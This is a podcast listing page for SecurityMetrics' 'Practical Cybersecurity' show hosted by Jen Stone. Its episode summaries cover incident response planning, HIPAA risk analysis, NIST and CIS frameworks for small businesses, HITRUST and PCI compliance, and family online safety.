Practical Cybersecurity with Jen Stone

SecurityMetrics

Practical Cybersecurity, hosted by Jen Stone (MCIS, CISSP, CISA, QSA), is the bridge between complex security frameworks and real-world business implementation. Whether you are a "Jack of all trades" IT manager or a business leader with limited resources, this show provides the roadmap to a defensible security posture. 

  1. 1D AGO · BONUS

    Pressure Testing Your IRP: Why "Calling IT" Isn't a Plan (Part 2)

    What happens when the news cameras show up and your business grinds to a halt? Donna Grindle, CEO of Kardon, returns to discuss the "hair on fire" reality of a data breach. We move past the paperwork to explore why "calling IT" isn't a plan, the hidden costs of notification letters, and how insurance mazes can complicate your recovery. Key Takeaways "Call IT" is Not a Plan: During a breach, IT will be busy containing the threat; you need an operational plan for when systems and phones go dark.The Paperwork Trap: Reverting to paper records stops cash flow because you aren't sending claims or bills—plus, you eventually have to manually re-enter all that data.Media & Legal Circus: If 500+ records are hit, you must notify the press. This often triggers immediate "ambulance chaser" lawsuits on social media.Tabletop Exercises: Don't find gaps in your plan during a crisis. Run practice drills to know who is authorized to speak for the company and what vendors to call.Insurance Realities: Open claims immediately to protect legal privilege, but be ready for insurance-mandated vendors that may span several time zones. "Take ownership of it. Don't assume that somebody else in your office is handling it... You will likely lose your business or be on the verge of it if you are not prepared in some way." — Donna Grindle  Key Concepts: Security Incident vs. Data Breach - A security incident is a panic-inducing event that requires investigation, but it may or may not officially escalate into a data breach that requires regulatory reporting. Incident Response Plan (IRP) - A comprehensive strategy that covers far more than just IT recovery; it must dictate how you communicate with employees, vendors, and clients during a crisis. Tabletop Exercise - A low-stakes practice run of your Incident Response Plan to poke holes in it before an actual emergency. It helps you figure out exactly who is in charge, who you are calling, and who is authorized to speak publicly. Links: Kardon: https://kardonhq.com/ Help Me With HIPAA Podcast: https://helpmewithhipaa.com/ Timestamps 00:00 – Intro 00:54 – Cyber Incidents vs Breaches in a HIPAA Context 01:26 – Why Operational Continuity Cannot be an IT Responsibility 03:02 – Questions to Ask During a Tabletop Exercise 03:50 – Talking to Patients on Facebook 04:06 – More Questions to Ask During a Cyber Incident 05:13 – Even "Calling My MSP" Isn't an Incident Response Plan 05:37 – When a Cyber Incident Becomes a Breach 06:09 – "Can't We Just Send a Postcard?" 06:32 – Steps to Respond to a HIPAA Breach 09:03 – Final Summary: Shifting to Active Security Ownership 09:59 – Where to Find Donna Grindle & Kardon A note from Jen: We built Practical Cybersecurity because we were tired of the fear-mongering in this industry. Security shouldn't be a secret club. If you're trying to figure out PCI compliance or need a pen test, my team at SecurityMetrics can help you out: https://www.securitymetrics.com/contact/lets-get-you-to-the-right-place But if you just want to learn how to protect yourself for free, start here: https://academy.securitymetrics.com/

    11 min

  2. 1D AGO

    Why Your Security Risk Analysis is Probably Wrong (Part 1)

    Are your IT or cloud providers handling your security? Does your site claim you're "HIPAA Compliant"? Donna Grindle, CEO of Kardon and co-host of Help Me With HIPAA, delivers a massive reality check for small business owners. We break down the difference between gap analysis and a true SRA, why IT speaks a different language, and how the "CREMATE" method finds your data. Key Takeaways Responsibility Can't Be Outsourced: Cloud apps and IT companies don't make you secure; you outsource liability, not responsibility.Real SRA vs. Gap Analysis: If your risk analysis lacks likelihood, impact, and strategy, it’s just a gap analysis—and you're exposed.CREMATE Your Data: Map PHI by tracking where you Create, Receive, Maintain, and Transmit itBusiness Associates (BA): If unauthorized access by a vendor would count as a breach, they are a BA.Documentation & AI: Use AI to draft policies from your bullets, but treat it like a fallible assistant and always verify the output.Frameworks: Use HICP 405(d) to get IT and management speaking the same security language."If you put on your website that you're HIPAA compliant, immediately I'm concerned." — Donna Grindle Links: Kardon: https://kardonhq.com Help Me With HIPAA Podcast: https://helpmewithhipaa.com/ HHS Website: https://www.hhs.gov/about/agencies/asa/ocio/cybersecurity/security-awareness-training/index.html HICP 405(d) Guidelines: https://405d.hhs.gov/ Timestamps 0:00 – Why a "HIPAA Compliant" Badge is a Red Flag 1:26 – Understanding HIPAA Covered Entities & Obligations 2:14 – The Difference Between Awareness Training and Security 3:18 – Why Your SRA Might Just Be a Gap Analysis 4:40 – Building an Inventory: You Can’t Protect What You Don’t Find 6:22 – Using the "CREMATE" Method for Data Mapping 8:21 – Why IT Cannot Be the "Department of No" 9:40 – Standardizing Communication with the HICP 405(d) Framework 10:41 – How to Document Your Policies (and Use AI to Help) 12:39 – The Easy Way to Tell if a Partner is a Business Associate 13:50 – Business Associate Red Flags A note from Jen: We built Practical Cybersecurity because we were tired of the fear-mongering in this industry. Security shouldn't be a secret club. If you're trying to figure out PCI compliance or need a pen test, my team at SecurityMetrics can help you out: https://www.securitymetrics.com/contact/lets-get-you-to-the-right-place But if you just want to learn how to protect yourself for free, start here: https://academy.securitymetrics.com/

    15 min
  3. Is NIST Too Complex for Small Businesses? Daniel Eliot Weighs In

    MAR 3

    Is NIST Too Complex for Small Businesses? Daniel Eliot Weighs In

    "I can’t think about cybersecurity this week; I’m thinking about 1099s." You’re not alone. Many SMBs see the NIST Cybersecurity Framework (CSF) as an overwhelming manual for government contractors, not a local shop or startup.  Jen Stone sits down with Daniel Eliot, NIST’s lead for small business engagement. We break down the new NIST CSF 2.0 Small Business Quick Start Guide —a "small-chunk" resource designed for under-resourced organizations to move from chaos to a structured program.  In this episode: Why having "everyone" responsible means "nobody" is.How to build a "reasonable" security program while managing payroll and daily operations.Why taking security seriously helps you win bigger contracts and scale safely.The exact steps (MFA, patching, backups, and more) that even large orgs get wrong.NIST Resources NIST (National Institute of Standards and Technology): https://www.nist.gov/Small Business Cybersecurity Corner: https://www.nist.gov/itl/smallbusinesscyberNIST CSF 2.0 (Cybersecurity Framework): https://www.nist.gov/cyberframeworkSmall Business Quick Start Guide: https://www.nist.gov/publications/nist-cybersecurity-framework-20-small-business-quick-start-guideContact Daniel and his team: smallbizsecurity@nist.govKey Term Definitions The 6 Functions: Govern, Identify, Protect, Detect, Respond, and RecoverMFA: Multi-Factor Authentication—essential for account access. Patching: Updating software to fix security "holes." MSP/MSSP: Local experts you can hire to manage IT security. Timestamps 00:00 – Many hats of small business owners00:26 – Daniel Eliot and NIST’s Mission02:25 – Exploring the Small Business Cybersecurity Corner03:20 – What is the NIST CSF?04:26 – The Small Business Quick Start Guide for CSF 2.006:52 – How to Identify Your Most Critical Assets09:56 – When to Seek Help: Engaging MSPs and Local Resources10:52 – Defining a "Successful" Cybersecurity Program13:21 – Essential Fundamentals: MFA, Patching, and Backups15:35 – How to Engage Directly with NIST Jen Stone (MCIS, CISSP, CISA, QSA) is a Principal Security Analyst at SecurityMetrics. With 25+ years in IT and 100+ high-level assessments, Jen specializes in making complex compliance actionable for businesses of all sizes. Outside of security, she is an aerial arts enthusiast and motorcycle rider.  A note from Jen: We built Practical Cybersecurity because we were tired of the fear-mongering in this industry. Security shouldn't be a secret club. If you're trying to figure out PCI compliance or need a pen test, my team at SecurityMetrics can help you out: https://www.securitymetrics.com/contact/lets-get-you-to-the-right-place But if you just want to learn how to protect yourself for free, start here: https://academy.securitymetrics.com/

    17 min
  4. "Good Enough" Security for Small Business Budgets

    FEB 17

    "Good Enough" Security for Small Business Budgets

    In this episode of Practical Cybersecurity, host Jen Stone talks with Curt Dukes, EVP and GM of Security Best Practices at the Center for Internet Security (CIS). Drawing on his 30-year career at the NSA, Dukes breaks down how small and medium businesses (SMBs) can implement "good enough" security without unlimited resources. The conversation focuses on Implementation Group 1 (IG1)—a prioritized set of safeguards that provide essential "cyber hygiene". Dukes introduces free resources like the CSAT (Controls Self-Assessment Tool) and CIS Workbench to help leaders move past the intimidation of technical jargon and establish a "standard of reasonableness" for their organization's defense. CIS Resources CIS (Center for Internet Security): The nonprofit organization that creates the global standards discussed in this episode.NSA (National Security Agency): The U.S. intelligence agency where Curt Dukes led defensive security efforts for 30+ years.IG1 (Implementation Group 1): The essential "Cyber Hygiene" tier of the CIS Controls designed for small businesses.CSAT (Controls Self-Assessment Tool): A free web-based application to track and measure your security progress.CIS Workbench: A collaborative platform to ask technical questions and get help from the security community.CIS RAM (Risk Assessment Method): A free methodology to identify security gaps and prioritize investments based on risk.CIS Benchmarks: Free, consensus-based configuration recommendations for OS and network devices.MS-ISAC (Multi-State Information Sharing and Analysis Center): The division of CIS providing threat intelligence for state and local governments.EI-ISAC (Elections Infrastructure ISAC): A dedicated team at CIS focused on securing election-related systems.The Community Defense Model (CDM): A data-driven report proving the effectiveness of the Controls against top cyber attacks.The Cost of Cyber Defense: A breakdown of the financial investment needed for various security models.A note from Jen: We built Practical Cybersecurity because we were tired of the fear-mongering in this industry. Security shouldn't be a secret club. If you're trying to figure out PCI compliance or need a pen test, my team at SecurityMetrics can help you out: https://www.securitymetrics.com/contact/lets-get-you-to-the-right-place But if you just want to learn how to protect yourself for free, start here: https://academy.securitymetrics.com/

    16 min

  5. 04/17/2025 · BONUS

    [Webinar] What You Can Expect from a HITRUST Assessment

    In this webinar, Matt Halbleib (Director of Assessments) and Lee Pierce (Director of HITRUST Sales) will discuss: How to determine which HITRUST Assessment type to chooseHow to prepare for a HITRUST Validation AssessmentWhat to expect from a SecurityMetrics HITRUST AssessmentReady to discuss your HITRUST needs? Request a quote here. Read our new HITRUST 101 White Paper here. A note from Jen: We built Practical Cybersecurity because we were tired of the fear-mongering in this industry. Security shouldn't be a secret club. If you're trying to figure out PCI compliance or need a pen test, my team at SecurityMetrics can help you out: https://www.securitymetrics.com/contact/lets-get-you-to-the-right-place But if you just want to learn how to protect yourself for free, start here: https://academy.securitymetrics.com/

    40 min

  6. 12/02/2024

    New to PCI Compliance? Get the Support You Need | SecurityMetrics Podcast 106

    Learn more about cyber risks for small businesses:  Are you a small-medium business owner? Did you just get a message from your bank telling you to call SecurityMetrics? Are you worried about having a bad experience? Do you know what PCI even means? This episode is for you. Learn how SecurityMetrics can help you navigate this regulatory landscape. We'll discuss: Why your processor is making you do PCI compliance: Did you know that nearly half of all cyberattacks target small businesses?What calling into SecurityMetrics looks like. Learn what information you need handy so you can get your compliance done as quickly as possible, and the questions you should ask to get the best service.Support Stories: Discover how other small businesses have successfully leveraged SecurityMetrics to achieve compliance.Tips and Tricks: Get practical advice on how to optimize your PCI compliance efforts and minimize risks, keeping your business and your customers more secure. Whether you're just starting your PCI compliance journey or looking to improve your existing processes, this video will provide valuable insights and actionable advice. A note from Jen: We built Practical Cybersecurity because we were tired of the fear-mongering in this industry. Security shouldn't be a secret club. If you're trying to figure out PCI compliance or need a pen test, my team at SecurityMetrics can help you out: https://www.securitymetrics.com/contact/lets-get-you-to-the-right-place But if you just want to learn how to protect yourself for free, start here: https://academy.securitymetrics.com/

    44 min

  7. 10/23/2024

    Are you ready for the ecommerce security storm? A buyer’s guide to PCI DSS 11.6.1 and 6.4.3

    Join us on this extra long episode as SecurityMetrics experts Jen Stone, Gary Glover, Aaron Willis and Chad Horton dive deep into the evolving landscape of PCI compliance for e-commerce businesses. With the deadline for PCI 4.0 rapidly approaching, understanding the new requirements for e-commerce is crucial. In this episode, our panelists discuss: Understanding PCI 4.0 for e-commerce: Learn about the key changes and their implications for your business, especially if you're a small or medium-sized enterprise.Combatting e-commerce skimmers: Discover how attackers target online transactions and the measures you can take to protect your customers' data.The power of script analysis: Understand how script scanning can help identify and mitigate vulnerabilities on your e-commerce website.Securing dynamic content: Explore the challenges of protecting websites with constantly changing content.Choosing the right security solution: Weigh the pros and cons of agent-based and agentless solutions, considering the specific needs of your business.Whether you're a seasoned PCI professional or just starting your compliance journey, learn this episode provides valuable insights to help you safeguard your e-commerce business and protect your customers' sensitive information. A note from Jen: We built Practical Cybersecurity because we were tired of the fear-mongering in this industry. Security shouldn't be a secret club. If you're trying to figure out PCI compliance or need a pen test, my team at SecurityMetrics can help you out: https://www.securitymetrics.com/contact/lets-get-you-to-the-right-place But if you just want to learn how to protect yourself for free, start here: https://academy.securitymetrics.com/

    1h 25m

  8. 09/25/2024

    Cybersecurity for Families: A Parent-Child Guide to Online Safety | SecurityMetrics Podcast 104

    Download the guide: https://www.cisecurity.org/insights/white-papers/from-both-sides-a-parental-guide-to-protecting-your-childs-online-activity Are you a parent looking for guidance on how to keep kids safe online? Join us for a candid conversation with Sean Atkinson, CISO at the Center for Internet Security, and his daughter, Emma, as they discuss their journey of creating a guide designed to help families have conversations about online safety. In this episode, you'll learn: Why open communication is key: Discover how Sean and Emma fostered an environment of trust and understanding about online safety.Common online dangers: Understand the risks your child may face, such as sharing personal information, cyberbullying, and meeting strangers online.Practical tips for parents: Get actionable advice on how to set boundaries, have difficult conversations, and create a safe online space for your child.Whether you're a new parent or a seasoned digital native, this podcast will help you start conversations and find resources to help you protect your child in the ever-evolving online world. A note from Jen: We built Practical Cybersecurity because we were tired of the fear-mongering in this industry. Security shouldn't be a secret club. If you're trying to figure out PCI compliance or need a pen test, my team at SecurityMetrics can help you out: https://www.securitymetrics.com/contact/lets-get-you-to-the-right-place But if you just want to learn how to protect yourself for free, start here: https://academy.securitymetrics.com/

    27 min
See All (110)

5
out of 5
8 Ratings

About

Practical Cybersecurity, hosted by Jen Stone (MCIS, CISSP, CISA, QSA), is the bridge between complex security frameworks and real-world business implementation. Whether you are a "Jack of all trades" IT manager or a business leader with limited resources, this show provides the roadmap to a defensible security posture. 

Information

You Might Also Like